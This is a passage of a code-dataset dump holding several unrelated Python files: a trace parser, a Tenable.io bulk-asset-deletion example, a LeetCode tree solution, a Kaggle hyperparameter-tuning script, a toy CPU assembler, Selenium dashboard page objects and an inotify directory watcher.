self.basic_blocks = OrderedDict()\n self.flows = {}\n self.symbols = OrderedDict()\n\n def load(self):\n basic_blocks = {}\n symbols = {}\n\n fcsv = open(self.infoname, 'r')\n inforeader = csv.reader(fcsv, skipinitialspace=True)\n\n for row in inforeader:\n if not len(row): continue\n\n if 'block' == row[0]:\n entry = int(row[1], 0)\n block = {\n 'type': row[0],\n 'entry': entry,\n 'module': int(row[2], 0),\n 'end': int(row[3], 0),\n 'last_pc': int(row[4], 0),\n 'last_asm': row[5]\n }\n basic_blocks[entry] = block\n\n elif 'symbol' == row[0]:\n entry = int(row[1], 0)\n symbol = {\n 'type': 'symbol',\n 'entry': entry,\n 'module': int(row[2], 0),\n 'ordinal': row[3],\n 'name': row[4],\n }\n symbols[entry] = symbol\n\n self.basic_blocks = basic_blocks\n self.symbols = symbols\n\n fcsv.close()\n\n def flow(self):\n flowname = re.sub(r'\\.log\\.csv$', '.log.flow', self.infoname)\n\n fp = open(flowname, 'r')\n flowreader = csv.reader(fp, skipinitialspace=True)\n flows = {}\n\n for row in flowreader:\n target_pc = int(row[0], 0)\n jump_from_pc = int(row[1], 0)\n occurence = int(row[2])\n\n if target_pc not in flows:\n flows[target_pc] = {}\n\n flows[target_pc][jump_from_pc] = occurence\n\n fp.close()\n\n self.flows = flows\n","repo_name":"firodj/bbtrace","sub_path":"plugin/bbtrace/InfoParser.py","file_name":"InfoParser.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"40"} +{"seq_id":"43061612470","text":"import os.path, sys\nsys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir))\nimport tenbIOcore as tc\nimport beautifyResults as br\nimport datetime\n\n# file and directory locations\nkey_file=\"../../io_keys.json\" # location of your key file\nresults_dir=\"../results/\" # the directory for your results\nstyles_dir=\"../styles/\" #style sheet location for web pages\n\n# delete bulk assets by tag\npayload = {\n\t\"query\": {\n\t\"field\": \"tag.4BulkDeletion\",\n\t\"operator\": \"eq\",\n\t\"value\": \"192-168-16\"\n\t},\n\t\"hard_delete\": 
True\n}\napi_keys=tc.read_keys(key_file,\"sandbox\")\nassets_deleted=tc.delete_bulk_assets(api_keys,payload)\nprint(\"Deleted \"+str(assets_deleted)+\" assets\")\n","repo_name":"jbowler432/tenb-reports","sub_path":"io_examples/delete_bulk_assets.py","file_name":"delete_bulk_assets.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"16096522449","text":"# https://leetcode-cn.com/problems/construct-binary-tree-from-preorder-and-inorder-traversal/submissions/\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def buildTree(self, preorder: List[int], inorder: List[int]) -> TreeNode:\n pre_len, in_len = len(preorder), len(inorder)\n root = self._build_tree(preorder, 0, pre_len - 1, inorder, 0, in_len - 1)\n return root\n\n def _build_tree(self, preorder, pre_left, pre_right,\n inorder, in_left, in_right):\n if pre_left > pre_right or in_left > in_right:\n return None\n\n pivot = preorder[pre_left]\n pivot_index = in_left\n while inorder[pivot_index] != pivot:\n pivot_index += 1\n root = TreeNode(pivot)\n root.left = self._build_tree(preorder, pre_left + 1, pre_left + pivot_index - in_left,\n inorder, in_left, pivot_index - 1)\n\n root.right = self._build_tree(preorder, pre_left + pivot_index - in_left + 1, pre_right,\n inorder, pivot_index + 1, in_right)\n return root\n\n","repo_name":"algorithm004-02/algorithm004-02","sub_path":"Week 02/id_442/LeetCode_105_442.py","file_name":"LeetCode_105_442.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"40"} +{"seq_id":"25611773459","text":"# https://www.kaggle.com/fabiendaniel/hyperparameter-tuning\nimport warnings\n\nimport pandas as pd\nimport numpy as np\n\nimport lightgbm as lgb\n\nfrom pprint import pprint\nfrom bayes_opt import BayesianOptimization, UtilityFunction\n\nfrom cv import run_cv_model\nfrom utils import print_step, rmse\nfrom drops import get_drops, save_drops, add_drops\nfrom cache import load_cache, save_in_cache\n\n\nprint('~~~~~~~~~~~~~~~~~~~~~~~')\nprint_step('Importing Data')\ntrain, test = load_cache('data_with_fe')\n\nprint_step('Subsetting')\ntarget = train['target']\ntrain_id = train['card_id']\ntest_id = test['card_id']\n\nfeatures = [c for c in train.columns if c not in ['card_id', 'first_active_month', 'target']]\nprint(train[features].shape)\nprint(test[features].shape)\n\ndrops = get_drops()\nfeatures_c = [f for f in features if f not in drops]\nprint(train[features_c].shape)\nprint(test[features_c].shape)\n\n\ndef runLGB(train_X, train_y, test_X, test_y, test_X2, params):\n print_step('Prep LGB')\n d_train = lgb.Dataset(train_X, label=train_y)\n d_valid = lgb.Dataset(test_X, label=test_y)\n watchlist = [d_train, d_valid]\n print_step('Train LGB')\n num_rounds = params.pop('num_rounds')\n verbose_eval = params.pop('verbose_eval')\n early_stop = None\n if params.get('early_stop'):\n early_stop = params.pop('early_stop')\n model = lgb.train(params,\n train_set=d_train,\n num_boost_round=num_rounds,\n valid_sets=watchlist,\n verbose_eval=verbose_eval,\n early_stopping_rounds=early_stop)\n print_step('Predict 1/2')\n pred_test_y = model.predict(test_X, num_iteration=model.best_iteration)\n print_step('Predict 2/2')\n pred_test_y2 = model.predict(test_X2, num_iteration=model.best_iteration)\n return pred_test_y, pred_test_y2, 
model.feature_importance()\n\n\ndef runBayesOpt(num_leaves, bag_fraction, feat_fraction, lambda1, lambda2, min_data):\n print('num_leaves {}, bag_fraction {}, feat_fraction {}, lambda1 {}, lambda2 {}, min_data {}'.format(int(num_leaves), bag_fraction, feat_fraction, lambda1, lambda2, int(min_data)))\n params = {'application': 'regression',\n 'boosting': 'gbdt',\n 'metric': 'rmse',\n 'num_leaves': int(num_leaves),\n 'max_depth': 11,\n 'learning_rate': 0.05,\n 'bagging_fraction': bag_fraction,\n 'feature_fraction': feat_fraction,\n 'lambda_l1': lambda1,\n 'lambda_l2': lambda2,\n 'min_data_in_leaf': int(min_data),\n 'early_stop': 40,\n 'verbose_eval': 20,\n 'verbosity': -1,\n 'data_random_seed': 3,\n 'nthread': 4,\n 'num_rounds': 10000}\n return run_cv_model(train[features_c], test[features_c], target, runLGB, params, rmse, 'lgb')\n\nLGB_BO = BayesianOptimization(runBayesOpt, {\n 'num_leaves': (10, 1200),\n 'bag_fraction': (0.1, 1.0),\n 'feat_fraction': (0.1, 0.9),\n 'lambda1': (1, 400),\n 'lambda2': (1, 400),\n 'min_data': (10, 300)\n})\nprint_step('Baseline')\nresults = runBayesOpt(num_leaves=105,\n bag_fraction=0.95,\n feat_fraction=0.8,\n lambda1=101.3,\n lambda2=120,\n min_data=21)\nprint_step('{}: {}'.format('baseline', results['final_cv']))\nbest_score = results['final_cv']\ncurrent_train_oofs = [results['train']]\ncurrent_test_oofs = [results['test']]\nwith warnings.catch_warnings():\n warnings.filterwarnings('ignore')\n abandon = False\n i = 2\n while i < 21 and not abandon:\n print('-')\n print('-')\n print('-')\n print_step('{}/20'.format(i))\n i += 1\n LGB_BO = BayesianOptimization(runBayesOpt, {\n 'num_leaves': (10, 1200),\n 'bag_fraction': (0.1, 1.0),\n 'feat_fraction': (0.1, 0.9),\n 'lambda1': (1, 400),\n 'lambda2': (1, 400),\n 'min_data': (10, 300)\n })\n utility = UtilityFunction(kind='ucb', kappa=2.5, xi=0.0)\n done = False\n tries = 0\n while not done:\n next_point_to_probe = LGB_BO.suggest(utility)\n results = runBayesOpt(**next_point_to_probe)\n weight = 1 / i\n score = rmse(target, (1 - weight) * np.mean(np.array(current_train_oofs), axis=0) + weight * results['train'])\n if score < best_score:\n done = True\n current_train_oofs.append(results['train'])\n current_test_oofs.append(results['test'])\n best_score = score\n else:\n tries += 1\n if tries > 20:\n print_step('20 tries exceeded... abandoning')\n done = True\n abandon = True\n LGB_BO.register(params=next_point_to_probe, target=-score)\n print_step('{}: Local {} - Global {} - Best {}'.format(next_point_to_probe, results['final_cv'], score, best_score))\n print('-')\n\nimport pdb\npdb.set_trace()\n\nrmse(target, np.mean([o for o in current_train_oofs], axis=0))\npd.DataFrame(np.corrcoef(current_train_oofs))\n[rmse(target, o) for o in current_train_oofs]\n[rmse(target, np.mean(current_train_oofs[:i], axis=0)) for i in np.array(range(len(current_train_oofs)))[1:]]\n\nsubmission = pd.DataFrame()\nsubmission['card_id'] = test_id\nsubmission['target'] = np.mean(current_test_oofs, axis=0)\nsubmission.to_csv('submit/submit_bayes_blend.csv', index=False)\n","repo_name":"peterhurford/kaggle-elo","sub_path":"bayes_forest.py","file_name":"bayes_forest.py","file_ext":"py","file_size_in_byte":5564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8261765647","text":"\"\"\"\r\nAssembler for the 16-bit Manas-CPU\r\n - Highest value of instruction argument is 11-bits, 5 bits for instruction code, so 0x7FF.\r\n - Provide .manas assembly file name or path.\r\n - Can also include output file name or path as third argument, \r\n however this is optional, it will default to \"output.manasbin\".\r\n\r\nFunctions:\r\n - strToInt(number:str) -> int\r\n - ReadInstructions(file: str) -> list[list]\r\n - Assemble(instructionList: list[list], outfile: str) -> None\r\n - run() -> None\r\n\r\nConstants:\r\n - PRG_END\r\n\r\nDictionaries:\r\n - Instruction_codes -> Contains all the instruction opcodes for the assembly instructions.\r\n\"\"\"\r\n\"\"\"\r\nCopyright (C) 2023 David Jøssang\r\n\r\nThis program is free software: you can redistribute it and/or modify\r\nit under the terms of the GNU General Public License as published by\r\nthe Free Software Foundation, either version 3 of the License, or\r\n(at your option) any later version.\r\n\r\nThis program is distributed in the hope that it will be useful,\r\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\r\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\nGNU General Public License for more details.\r\n\r\nYou should have received a copy of the GNU General Public License\r\nalong with this program. 
If not, see <https://www.gnu.org/licenses/>.\r\n\"\"\"\r\n\r\nimport sys\r\n\r\n#Explanations are in the microassembler\r\nPRG_END = 0b1111100000000000\r\nInstruction_codes = {\r\n \"LDA\": 0b0000100000000000,\r\n \"LDB\": 0b0001000000000000,\r\n \"LDC\": 0b0001100000000000,\r\n \"LDIA\": 0b0010000000000000,\r\n \"LDIB\": 0b0010100000000000,\r\n \"LDIC\": 0b0011000000000000,\r\n \"STA\": 0b0011100000000000,\r\n \"STB\": 0b0100000000000000,\r\n \"STC\": 0b0100100000000000,\r\n\r\n \"ADD\": 0b0101000000000000,\r\n \"SUB\": 0b0101100000000000,\r\n \"MULT\": 0b0110000000000000,\r\n \"SHL\": 0b0110100000000000,\r\n \"SHR\": 0b0111000000000000,\r\n\r\n \"JMP\": 0b0111100000000000,\r\n \"JMPZ\": 0b1000000000000000,\r\n\r\n \"LDAIN\": 0b1000100000000000,\r\n \"STAOUT\": 0b1001000000000000,\r\n\r\n \"SWP\": 0b1001100000000000,\r\n \"SWPC\": 0b1010000000000000,\r\n\r\n \"HLT\": 0b1010100000000000,\r\n \"NOP\": 0b1011000000000000\r\n}\r\n\r\ndef strToInt(number: str) -> int:\r\n \"Checks if number in str form is appended by 0x or 0b and converts it into appropriate base integer\"\r\n if (len(number) > 1):\r\n if (number[0:2] == \"0x\"):\r\n return int(number[2:],base=16)\r\n elif (number[0:2] == \"0b\"):\r\n return int(number[2:],base=2)\r\n else:\r\n return int(number)\r\n else:\r\n return int(number)\r\n\r\ndef ReadInstructions(file: str) -> list[list]:\r\n \"\"\"\r\n Reads provided .manas assembly file, removes unnecessary whitespace characters and returns list of \r\n instructions and labels.\r\n\r\n Attributes:\r\n - file: Name or path to .manas assembly file to read.\r\n \"\"\"\r\n readInstructions = []\r\n with open(file, \"r\") as f:\r\n for line in f:\r\n instructions = line.rstrip()\r\n instructions = \" \".join(instructions.split()) # Remove all whitespace characters and seperate instructions by only one space\r\n instructions = instructions.split(\" \")\r\n if (instructions[0] != \"\" and instructions[0][0] != \";\"):\r\n readInstructions.append(instructions)\r\n return readInstructions\r\n\r\ndef Assemble(instructionList: list[list], outfile: str) -> None:\r\n \"\"\"\r\n Reads provided list of instructions and labels and assembles it into hex addressed machine code for the\r\n Manas-CPU.\r\n\r\n Attributes:\r\n - instructionList: List of instructions and labels to assemble.\r\n - outfile: Name or path to file the function will write to.\r\n \"\"\"\r\n assembledInstructions = []\r\n lineLength = 16\r\n labels = {}\r\n currentPosition = -1\r\n adjustment = 0\r\n #print(instructionList)\r\n for instruction in instructionList:\r\n currentPosition += 1\r\n if (instruction[0][-1] == \":\"): # do labels and define bytes\r\n if (len(instruction) > 1 and instruction[1][0] != \";\"): # if there is a value after label, then treat label as a variable\r\n labels[instruction[0][0:-1]] = strToInt(instruction[1])\r\n else: # If label only by itself, treat as address\r\n labels[instruction[0][0:-1]] = currentPosition - adjustment # Adjust address for amount of labels\r\n adjustment += 1\r\n #print(labels)\r\n currentPosition = -1\r\n for instruction in instructionList:\r\n currentPosition += 1\r\n if (instruction[0][0:-1] in labels): continue\r\n elif (instruction[0] == \"db\"): # Define one word of data, placed at current position in program memory\r\n assembledInstructions.append(f'{strToInt(instruction[1]):04x}')\r\n elif (instruction[0] in Instruction_codes): # Check if current instruction in opcodes\r\n if (len(instruction) == 1 or instruction[1][0] == \";\"): \r\n 
assembledInstructions.append(f'{Instruction_codes[instruction[0]]:04x}')\r\n elif (instruction[1] in labels): # Check if argument is label, can be address or variable\r\n assembledInstructions.append(f'{Instruction_codes[instruction[0]] | labels[instruction[1]]:04x}')\r\n else:\r\n assembledInstructions.append(f'{Instruction_codes[instruction[0]] | strToInt(instruction[1]):04x}')\r\n else: \r\n print(f\"Error, cannot assemble instruction: {instruction}!\")\r\n assembledInstructions.append(f'{PRG_END:04x}')\r\n with open(outfile, \"w\") as f:\r\n line = 0\r\n currentPosition = 0\r\n print(\"v3.0 hex words addressed\", file=f)\r\n for i in range(len(assembledInstructions) // lineLength + 1):\r\n print(f'{(line*lineLength):04x}:', file=f, end=\" \")\r\n for y in range(lineLength):\r\n if (currentPosition > len(assembledInstructions)-1):\r\n break\r\n print(assembledInstructions[currentPosition], file=f, end=\" \")\r\n currentPosition += 1\r\n #print(assembledInstructions)\r\n\r\ndef run() -> None:\r\n if (len(sys.argv) < 2):\r\n print(__doc__)\r\n elif (len(sys.argv) == 2):\r\n manasAssemblyfile = sys.argv[1]\r\n outputfile = \"output.manasbin\"\r\n insList = ReadInstructions(manasAssemblyfile)\r\n Assemble(insList, outputfile)\r\n else:\r\n manasAssemblyfile = sys.argv[1]\r\n outputfile = sys.argv[2]\r\n insList = ReadInstructions(manasAssemblyfile)\r\n Assemble(insList, outputfile)\r\n\r\nif __name__ == \"__main__\":\r\n run()","repo_name":"Regaliae/Manas-CPU","sub_path":"Code/Manas-CPU_Assembler.py","file_name":"Manas-CPU_Assembler.py","file_ext":"py","file_size_in_byte":6684,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"24377345819","text":"from base.selenium_driver import SeleniumDriver\n\nimport utilities.custom_logger as cl\nimport logging\n\n\nclass PlaybackTabPage(SeleniumDriver):\n log = cl.customLogger(logging.DEBUG)\n\n def __init__(self, driver):\n super().__init__(driver)\n self.driver = driver\n\n _select_analytics_tab = \"//span[contains(text(),'Analytics')]\"\n _select_playback_tab = \"//a[contains(text(),'Playback')]\"\n\n def select_analytic_playback_tab(self):\n self.elementClick(self._select_analytics_tab, locatorType=\"xpath\")\n self.hold_wait()\n self.elementClick(self._select_playback_tab, locatorType=\"xpath\")\n self.hold_wait()\n\n # _select_floor = \"//label[@class='map-selected-floor']//span[contains(text(), ' 4')]\"\n # _select_floor = \"//label[@class='map-selected-floor']//input[@type='radio']\"\n _select_floor = \"//div[@class='leaflet-control-layers-base']/label//div//span[contains(text(), '4')]\"\n\n def select_floor(self):\n self.elementClick(self._select_floor, locatorType=\"xpath\")\n\n # locators\n\n # _select_venue = \"//mat-select[@role='combobox']\"\n _select_venue = \"//mat-select[@placeholder='Venue']\"\n # _choose_venue = \"//input[@placeholder='Search']\"\n _select_venue_it = \"//span[@class='mat-option-text'][normalize-space()='ICA_2021']\"\n\n def enter_venue_name(self, v_n):\n self.hold_wait()\n self.elementClick(self._select_venue, locatorType=\"xpath\")\n # self.hold_wait()\n # self.backspace_clear(self._select_venue, locatorType=\"xpath\")\n self.hold_wait()\n # self.sendKeys(v_n, self._choose_venue, locatorType=\"xpath\")\n # self.hold_wait()\n self.elementClick(self._select_venue_it, locatorType=\"xpath\")\n self.click_out()\n self.hold_wait()\n\n _click_out = \"//body\"\n\n def click_out(self):\n self.elementClick(self._click_out, locatorType=\"xpath\")\n\n _duration = 
\"//mat-select[@placeholder='Duration']\"\n # _select_duration_slot = \"//span[contains(text(),'1 hour')]\"\n _select_duration_slot = \"//mat-select[@placeholder='Duration']//span[contains(text(),'8 hours')]\"\n\n # def set_duration(self):\n # self.elementClick(self._duration, locatorType=\"xpath\")\n # self.hold_wait()\n #\n # self.elementClick(self._select_duration_slot)\n # self.hold_wait()\n\n _start_date = \"//input[@data-placeholder='Start Date']\"\n _start_time = \"//input[@data-placeholder='Start time']\"\n\n _end_date = \"//input[@data-placeholder='End Date']\"\n _end_time = \"//input[@data-placeholder='End time']\"\n\n _start_date_error = \"//mat-error[contains(text(),'Start date should be greater than ')]\"\n\n def choose_date_and_time(self, s_date, s_time, e_date, e_time):\n # self.select_floor()\n\n self.backspace_clear(self._start_date, locatorType=\"xpath\")\n self.sendKeys(s_date, self._start_date, locatorType=\"xpath\")\n self.hold_wait()\n self.backspace_clear(self._start_time, locatorType=\"xpath\")\n self.sendKeys(s_time, self._start_time, locatorType=\"xpath\")\n\n self.backspace_clear(self._end_date, locatorType=\"xpath\")\n self.sendKeys(e_date, self._end_date, locatorType=\"xpath\")\n self.hold_wait()\n self.backspace_clear(self._end_time, locatorType=\"xpath\")\n self.sendKeys(e_time, self._end_time, locatorType=\"xpath\")\n\n # start_date_error_msg_appear = self.isElementPresent(self._start_date_error, locatorType=\"xpath\")\n # txt = start_date_error_msg_appear.text\n # print(txt)\n # if start_date_error_msg_appear == True:\n # starting_with = txt[:34]\n # print(starting_with)\n # return starting_with\n\n _time_zone = \"//input[@data-placeholder='Timezone']\"\n _select_element = \"//span[@class='mat-option-text']\"\n\n # _time_zone_name = \"//span[normalize-space()='Africa/Dar_es_Salaam']\"\n\n def select_timezone(self, country_name):\n # self.elementClick(self._time_zone, locatorType=\"xpath\")\n self.hold_wait()\n self.backspace_clear(self._time_zone, locatorType=\"xpath\")\n self.hold_wait()\n self.sendKeys(country_name, self._time_zone, locatorType=\"xpath\")\n self.hold_wait()\n # self.click_out()\n self.elementClick(self._select_element, locatorType=\"xpath\")\n\n # _draw_type = \"//span[contains(text(),'Dot')]\"\n # _draw_type_dot = \"//mat-option[@role='option'][1]\"\n _draw_type = \"//mat-select[@placeholder='Draw Type']\"\n _draw_type_Line = \"//span[@class='mat-option-text'][normalize-space()='Line']\"\n _draw_type_Dot = \"//span[@class='mat-option-text'][normalize-space()='Dot']\"\n _draw_type_Trail = \"//span[@class='mat-option-text'][normalize-space()='Trail']\"\n\n def select_draw_style_dot(self):\n self.elementClick(self._draw_type, locatorType=\"xpath\")\n self.hold_wait()\n self.elementClick(self._draw_type_Dot, locatorType=\"xpath\") # change this xpath as per requirements\n self.hold_wait()\n\n def select_draw_style_line(self):\n self.elementClick(self._draw_type, locatorType=\"xpath\")\n self.hold_wait()\n self.elementClick(self._draw_type_Line, locatorType=\"xpath\") # change this xpath as per requirements\n self.hold_wait()\n\n def select_draw_style_trail(self):\n self.elementClick(self._draw_type, locatorType=\"xpath\")\n self.hold_wait()\n self.elementClick(self._draw_type_Trail, locatorType=\"xpath\") # change this xpath as per requirements\n self.hold_wait()\n\n\n _search_ = \"//span[contains(text(),'Search')]\"\n _search_btn_status_ = \"//div[@class='map-input map-submit-wrapper']//button\"\n\n def click_search(self):\n # 
self.elementClick(self._search_, locatorType=\"xpath\")\n # self.hold_wait()\n\n get_search_btn_attribute = self.getElement(self._search_btn_status_, locatorType=\"xpath\")\n get_search_btn_stats = get_search_btn_attribute.get_attribute(\"disabled\")\n print(get_search_btn_stats)\n\n # if get_search_btn_stats != 'true':\n # if get_search_btn_stats == 'true':\n if get_search_btn_stats is None:\n self.elementClick(self._search_, locatorType=\"xpath\")\n self.hold_wait()\n return get_search_btn_stats\n\n # def click_search(self):\n # self.elementClick(self._search_, locatorType=\"xpath\")\n # self.hold_wait()\n\n # _select_all_users = \"//label[@for='mat-checkbox-5-input']//div[@class='mat-checkbox-inner-container']\"\n # _select_all_users = \"//div[@class='map-all-tree-users-select']//div[@class='mat-checkbox-inner-container']\"\n _select_all_users = \"//div[@class='map-all-tree-users-select']\"\n\n def select_all_users(self):\n # self.waitForElement(self._select_all_users, locatorType=\"xpath\", timeout=10, pollFrequency=0.5)\n self.hold_wait()\n self.elementClick(self._select_all_users, locatorType=\"xpath\")\n self.hold_wait()\n\n _specific_data_xpath_1 = \"//div[@aria-label='LFA_Test_3.1.2-A2E']\"\n\n def select_specific_data(self):\n self.elementClick(self._specific_data_xpath_1, locatorType=\"xpath\")\n\n _play_arrow = \"//mat-icon[normalize-space()='play_arrow']\"\n\n def play_btn(self):\n # self.isElementPresent(self._play_arrow, locatorType=\"xpath\")\n self.hold_wait()\n try:\n self.elementClick(self._play_arrow, locatorType=\"xpath\")\n self.hold_wait()\n except:\n print(\"sdd\")\n # self.screen_shot(file=\"test_3_3_1_filter_sessions_by_time_playback\")\n\n _select_venue_for_show_zone = \"//mat-select[@placeholder='Venue']\"\n _select_venue_it_for_show_zone = \"//span[@class='mat-option-text'][normalize-space()='TDK_HQ_Nihonbashi']\"\n\n def enter_venue_name_for_show_zone(self):\n self.hold_wait()\n self.elementClick(self._select_venue_for_show_zone, locatorType=\"xpath\")\n self.hold_wait()\n self.elementClick(self._select_venue_it_for_show_zone, locatorType=\"xpath\")\n self.click_out()\n self.hold_wait()\n\n _sel_flr = \"//label[@class='map-selected-floor']//span[contains(text(), '')]\"\n # _set_floor = \"//label[@class='map-selected-floor']//span[contains(text(), ' 26')]\"\n _set_floor = \"//div[@class='leaflet-control-layers-base']/label//div//span[contains(text(), '28F')]\"\n _toggle_show_zone = \"//div[@class='mat-slide-toggle-bar']\"\n\n def show_zones(self):\n self.select_analytic_playback_tab()\n self.enter_venue_name_for_show_zone()\n self.elementClick(self._toggle_show_zone, locatorType=\"xpath\")\n # self.elementClick(self._sel_flr, locatorType=\"xpath\")\n self.elementClick(self._set_floor, locatorType=\"xpath\")\n self.hold_wait()\n get_floor_number_element = self.getElement(self._set_floor, locatorType=\"xpath\")\n get_floor_number_txt = get_floor_number_element.text\n print(get_floor_number_txt)\n # self.screen_shot(file=\"test_3_3_2_show_zones\")\n return get_floor_number_txt\n","repo_name":"hjasani-invn/Venue-Dashboards-Automation-QA","sub_path":"LiveFeed_Analytic_Dashboard/pages/tabs/analytics/playback_page.py","file_name":"playback_page.py","file_ext":"py","file_size_in_byte":8967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27841188966","text":"#!/usr/bin/env python\n\n'''\nObserve a directory, and then execute argument-provided script\nwhen files within that directory settle down.\n'''\n\n# 
Imports for groundwork and directory-watching\nfrom inotify.adapters import Inotify, InotifyTree\nfrom getopt import gnu_getopt\nimport logging\nfrom os.path import basename, getsize, isdir, isfile, join, realpath\nfrom threading import Thread\nfrom sys import argv, stderr, stdout\n# Imports for file handling.\nfrom dataclasses import dataclass\nfrom subprocess import Popen as cmd, DEVNULL as devnull\nfrom os import access, walk, X_OK\nfrom queue import Empty as empty, PriorityQueue, Queue\nfrom time import sleep, time\n\ndef _build_logger(label, err = None, out = None):\n obj = logging.getLogger(label)\n obj.setLevel(logging.DEBUG)\n # Err\n err_handler = logging.StreamHandler(err or stderr)\n err_filter = logging.Filter()\n err_filter.filter = lambda record: record.levelno >= logging.WARNING\n err_handler.addFilter(err_filter)\n obj.addHandler(err_handler)\n # Out\n out_handler = logging.StreamHandler(out or stdout)\n out_filter = logging.Filter()\n out_filter.filter = lambda record: record.levelno < logging.WARNING\n out_handler.addFilter(out_filter)\n obj.addHandler(out_handler)\n return obj\n_logger = _build_logger('directory_watcher')\n\ndef _colour_path(path):\n return _colour_text(path, COLOUR_GREEN)\n\ndef _colour_text(text, colour = None):\n colour = colour or COLOUR_BOLD\n # A useful shorthand for applying a colour to a string.\n return '%s%s%s' % (colour, text, COLOUR_OFF)\n\ndef _enable_colours(force = None):\n global COLOUR_BOLD\n global COLOUR_BLUE\n global COLOUR_RED\n global COLOUR_GREEN\n global COLOUR_YELLOW\n global COLOUR_OFF\n if force == True or (force is None and stdout.isatty()):\n # Colours for standard output.\n COLOUR_BOLD = '\\033[1m'\n COLOUR_BLUE = '\\033[1;94m'\n COLOUR_RED = '\\033[1;91m'\n COLOUR_GREEN = '\\033[1;92m'\n COLOUR_YELLOW = '\\033[1;93m'\n COLOUR_OFF = '\\033[0m'\n else:\n # Set to blank values if not to standard output.\n COLOUR_BOLD = ''\n COLOUR_BLUE = ''\n COLOUR_RED = ''\n COLOUR_GREEN = ''\n COLOUR_YELLOW = ''\n COLOUR_OFF = ''\n_enable_colours()\n\ndef _is_executable(path):\n return access(path, X_OK)\n\ndef _parse_args(args_raw):\n\n error = False\n\n def check_number(value_raw):\n try:\n value = int(value_raw)\n if value > 0:\n return value, True\n except ValueError:\n pass\n _logger.error(f'Invalid number: {value_raw}')\n return None, False\n\n def check_path(value_raw, label, check):\n if not check(value_raw):\n _logger.error(f'Invalid {label} path: {_colour_path(value_raw)}')\n return None, False\n return realpath(value_raw), True\n\n def hexit(exit_code):\n _logger.error('Usage: %s dir -s script [-w workers] [--execute-only]' % basename(__file__))\n exit(exit_code)\n try:\n args, operands = gnu_getopt(args_raw, 'hrs:w:', ['execute-only'])\n except Exception as e:\n _logger.error(f'Error parsing arguments: {e}')\n hexit(1)\n\n data = {'dirs':[]}\n script = None\n workers_raw = None\n\n for arg, value_raw in args:\n if arg == '-h':\n hexit(0)\n if arg == '-r':\n data['recursive'] = True\n elif arg == '-s':\n script = value_raw\n elif arg == '-w':\n workers_raw = value_raw\n elif arg == '--execute-only':\n data['execute_only'] = True\n\n good = True\n\n if script:\n data['script'], good_arg = check_path(script, 'script', lambda s: isfile(s) and _is_executable(s))\n good = good and good_arg\n else:\n good = False\n _logger.error('No script provided.')\n\n if workers_raw:\n data['workers'], good_arg = check_number(workers_raw)\n good = good and good_arg\n\n if operands:\n for dir_path_raw in operands:\n dir_path, good_arg = 
check_path(dir_path_raw, 'target directory', lambda s: isdir(s))\n data['dirs'].append(dir_path)\n good = good and good_arg\n else:\n _logger.error('No directory provided.')\n good = False\n\n if not good:\n hexit(1)\n\n return data\n\ndef _main(args_raw):\n kwargs = _parse_args(args_raw)\n run(**kwargs)\n return 0\n\ndef run(**kwargs):\n\n # Parse arguments\n ##\n\n dirs = kwargs.get('dirs')\n execute_only = kwargs.get('execute_only', False)\n recursive = kwargs.get('recursive', False)\n rest_time = kwargs.get('rest_time', 2)\n script = kwargs.get('script')\n timeout = kwargs.get('timeout')\n workers = kwargs.get('workers', 1)\n\n if execute_only:\n rest_time = 0\n\n # Print Info\n ##\n\n _logger.info(f'Target directory: {_colour_path(dirs[-1])}')\n if recursive:\n _logger.info('Observing directory recursively.')\n _logger.info(f'Script: {_colour_path(script)}')\n _logger.info(f'Script runner threads: {_colour_text(workers)}')\n if rest_time:\n _logger.info(f'Files are at rest after {rest_time}s of inactivity.')\n\n # Initialize support threads\n ##\n\n queue_input = Queue()\n queue_output = PriorityQueue()\n\n # Create monitor thread.\n worker_monitor = MonitorThread(queue_input, queue_output, rest_time)\n worker_monitor.start()\n\n threads = [worker_monitor]\n\n # Create worker threads.\n for i in range(workers):\n t = WorkerThread(script, queue_output)\n t.start()\n threads.append(t)\n\n # Initialize watcher(s)\n ##\n\n if not execute_only:\n if recursive:\n watcher = InotifyTree(dirs[-1])\n else:\n watcher = Inotify()\n watcher.add_watch(dirs[-1])\n\n delete_events = [\n 'IN_DELETE',\n 'IN_MOVED_FROM'\n ]\n\n write_events = [\n 'IN_CLOSE_WRITE',\n 'IN_MOVED_TO'\n ]\n\n # Run watcher(s)\n ##\n\n if execute_only:\n for current_dir in dirs:\n for dirname, _, files in walk(current_dir):\n for filename in files:\n queue_input.put((join(dirname, filename), True))\n worker_monitor.set_done()\n worker_monitor.join()\n for t in threads:\n t.set_done()\n else:\n for event in watcher.event_gen(yield_nones = False):\n (_, type_names, dirname, filename) = event\n\n is_write = len([1 for event_type in type_names if event_type in write_events]) > 0\n is_delete = len([1 for event_type in type_names if event_type in delete_events]) > 0\n\n if not (is_write or is_delete):\n # Not a notable event\n continue\n\n queue_input.put((join(dirname, filename), is_write))\n\n for t in threads:\n t.join()\n\nclass MonitorThread(Thread):\n def __init__(self, queue_in: Queue, queue_out: PriorityQueue, rest_time: float):\n Thread.__init__(self)\n self.__done = False\n self.__queue_in = queue_in\n self.__queue_out = queue_out\n self.__rest_time = rest_time\n\n def set_done(self):\n self.__done = True\n\n def run(self):\n\n data = {}\n\n while True:\n # Load up new items\n while not self.__queue_in.empty():\n path, addition = self.__queue_in.get()\n\n if not addition:\n # if not addition, then deletion\n if path in data and not isfile(path):\n del data[path]\n continue\n\n if path in data:\n # Already filed\n data[path].time = time()\n else:\n # Newly-observed\n if not isfile(path):\n # Not a file, vanished in between\n continue\n\n try:\n data[path] = MonitorInstance(size=getsize(path), time=time())\n except OSError as 